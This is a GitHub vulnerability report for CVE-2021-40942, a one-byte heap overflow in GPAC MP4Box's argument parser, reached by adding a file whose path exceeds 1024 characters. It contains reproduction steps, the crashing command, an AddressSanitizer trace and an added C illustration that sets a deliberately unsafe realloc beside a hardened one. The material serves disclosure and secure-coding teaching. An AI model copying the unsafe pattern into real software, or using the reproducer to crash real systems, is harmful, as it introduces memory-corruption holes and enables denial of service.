CVE-2021-40942: heap-buffer-overflow in MP4Box at filter_core/filter.c:1454 · Issue #1908 · gpac/gpac

In GPAC MP4Box v1.1.0, there is a heap-buffer-overflow in the function filter_parse_dyn_args in filter_core/filter.c:1454, as demonstrated by GPAC. This can cause a denial of service (DoS).

Tags: #dos #git #c++

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

  • I looked for a similar issue and couldn’t find any.
  • I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
  • I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line …)

Steps to reproduce:

1. Get the latest commit code (GPAC version 1.1.0-DEV-rev1216-gb39aa09c0-master)
2. Compile with --enable-sanitizer
3. Make 5 directories, each with a long name (length=255), so that the file's absolute path length is larger than 1024; we call the file large.nhml
4. Run MP4Box -add {path to large.nhml} -new new.mp4

Env:
Ubuntu 20.04, clang 12.0.1

My command line and ASAN report:
MP4Box -add ~/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/large.nhml -new new.mp4

==2343764==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00000a7a1 at pc 0x7fb8ca3e675d bp 0x7ffd40a5e9d0 sp 0x7ffd40a5e9c8
WRITE of size 1 at 0x61a00000a7a1 thread T0
    #0 0x7fb8ca3e675c in filter_parse_dyn_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1454:13
    #1 0x7fb8ca3cf6dc in gf_filter_parse_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1726:2
    #2 0x7fb8ca3cdbe0 in gf_filter_new_finalize /home/lly/pro/gpac_public/src/filter_core/filter.c:418:2
    #3 0x7fb8ca3cc58a in gf_filter_new /home/lly/pro/gpac_public/src/filter_core/filter.c:382:7
    #4 0x7fb8ca3c3d27 in gf_fs_load_source_dest_internal /home/lly/pro/gpac_public/src/filter_core/filter_session.c:2845:12
    #5 0x7fb8ca3c47b0 in gf_fs_load_source /home/lly/pro/gpac_public/src/filter_core/filter_session.c:2885:9
    #6 0x7fb8c9f97e29 in gf_media_import /home/lly/pro/gpac_public/src/media_tools/media_import.c:1469:11
    #7 0x50522f in import_file /home/lly/pro/gpac_public/applications/mp4box/fileimport.c:1289:7
    #8 0x4e1a09 in do_add_cat /home/lly/pro/gpac_public/applications/mp4box/main.c:4257:10
    #9 0x4e79ca in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:5746:13
    #10 0x4ea7ca in main /home/lly/pro/gpac_public/applications/mp4box/main.c:6456:1
    #11 0x7fb8c92ba0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #12 0x429a8d in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429a8d)

0x61a00000a7a1 is located 0 bytes to the right of 1313-byte region [0x61a00000a280,0x61a00000a7a1)
allocated by thread T0 here:
    #0 0x4a4c69 in realloc (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a4c69)
    #1 0x7fb8ca3e529d in filter_parse_dyn_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1451:12
    #2 0x7fb8ca3cf6dc in gf_filter_parse_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1726:2
    #3 0x7fb8ca3cdbe0 in gf_filter_new_finalize /home/lly/pro/gpac_public/src/filter_core/filter.c:418:2

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lly/pro/gpac_public/src/filter_core/filter.c:1454:13 in filter_parse_dyn_args
Shadow bytes around the buggy address:
  0x0c347fff94a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fff94b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fff94c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fff94d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fff94e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c347fff94f0: 00 00 00 00[01]fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fff9500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fff9520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fff9530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fff9540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
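The report above shows the classic signature of a terminator off-by-one: a WRITE of size 1 landing 0 bytes to the right of a region that was just grown by realloc. The following is an added illustration of that bug class and its hardened counterpart; it is constructed for this page and is not GPAC's code. The dynstr type, the grow_size_* helpers and build_long_path are assumptions invented here. The unsafe variant is shown for contrast only and is never executed; the hardened variant is exercised by building a path with five 255-character components, as in the reproduction steps, and confirming the terminator stays inside the allocation.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative dynamic string used to model the reported bug class:
 * an argument buffer grown with realloc, where the terminating NUL is
 * written one byte past the allocation. Constructed example, not GPAC code. */
typedef struct {
    char  *buf;  /* heap buffer, NUL-terminated when well-formed */
    size_t len;  /* characters stored, excluding the terminator */
    size_t cap;  /* bytes allocated */
} dynstr;

/* Bytes the buggy pattern requests: room for the characters only. */
size_t grow_size_buggy(size_t len, size_t add) { return len + add; }

/* Bytes the corrected pattern requests: characters plus one for the NUL. */
size_t grow_size_fixed(size_t len, size_t add) { return len + add + 1; }

/* Index at which the terminator is written after an append. It equals
 * grow_size_buggy(), i.e. one past the end of the region: the
 * "0 bytes to the right" WRITE of size 1 that AddressSanitizer reports. */
size_t terminator_index(size_t len, size_t add) { return len + add; }

/* Vulnerable form (for contrast only, never called here): the realloc size
 * omits the terminator, so buf[len] lands outside the allocated region. */
int dynstr_append_unsafe(dynstr *s, const char *src) {
    size_t add = strlen(src);
    char *p = realloc(s->buf, grow_size_buggy(s->len, add));
    if (!p) return -1;
    s->buf = p;
    memcpy(s->buf + s->len, src, add);
    s->len += add;
    s->buf[s->len] = '\0';   /* heap-buffer-overflow, WRITE of size 1 */
    return 0;
}

/* Hardened form: reject size_t wrap-around, reserve the terminator, and grow
 * geometrically so a long input (a 1024+ byte path) costs few reallocations. */
int dynstr_append(dynstr *s, const char *src) {
    size_t add = strlen(src);
    if (add > SIZE_MAX - s->len - 1) return -1;   /* len + add + 1 would wrap */
    size_t need = grow_size_fixed(s->len, add);
    if (need > s->cap) {
        size_t ncap = s->cap ? s->cap : 64;
        while (ncap < need) {
            if (ncap > SIZE_MAX / 2) { ncap = need; break; }
            ncap *= 2;
        }
        char *p = realloc(s->buf, ncap);
        if (!p) return -1;
        s->buf = p;
        s->cap = ncap;
    }
    memcpy(s->buf + s->len, src, add);
    s->len += add;
    s->buf[s->len] = '\0';   /* in bounds: len < cap is guaranteed above */
    return 0;
}

void dynstr_free(dynstr *s) { free(s->buf); s->buf = NULL; s->len = s->cap = 0; }

/* Build an absolute path from `depth` directory components of `namelen`
 * characters each plus a file name, mirroring the reproduction steps.
 * Returns the path length, or 0 on allocation failure. Caller frees *out. */
size_t build_long_path(dynstr *out, int depth, size_t namelen, const char *file) {
    char *name = malloc(namelen + 1);
    if (!name) return 0;
    memset(name, '1', namelen);   /* constructed component, e.g. "111...1" */
    name[namelen] = '\0';
    memset(out, 0, sizeof *out);
    for (int i = 0; i < depth; i++) {
        if (dynstr_append(out, "/") || dynstr_append(out, name)) {
            free(name); dynstr_free(out); return 0;
        }
    }
    free(name);
    if (dynstr_append(out, "/") || dynstr_append(out, file)) { dynstr_free(out); return 0; }
    return out->len;
}

int main(void) {
    dynstr path;
    size_t n = build_long_path(&path, 5, 255, "large.nhml");
    printf("path length %zu, terminator at index %zu of %zu allocated bytes\n",
           n, path.len, path.cap);
    dynstr_free(&path);
    return 0;
}
```

The check that matters is the relation between the terminator's index and the requested size: with the buggy sizing they are equal, so the write is out of bounds by exactly one byte whatever the input length; with the corrected sizing the index is always strictly less than the capacity. A sanitizer build (as in step 2 of the report) turns that one-byte write into the immediate report shown above instead of silent heap corruption.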

Related news

Gentoo Linux Security Advisory 202408-21

Gentoo Linux Security Advisory 202408-21 - Multiple vulnerabilities have been discovered in GPAC, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 2.2.0 are affected.
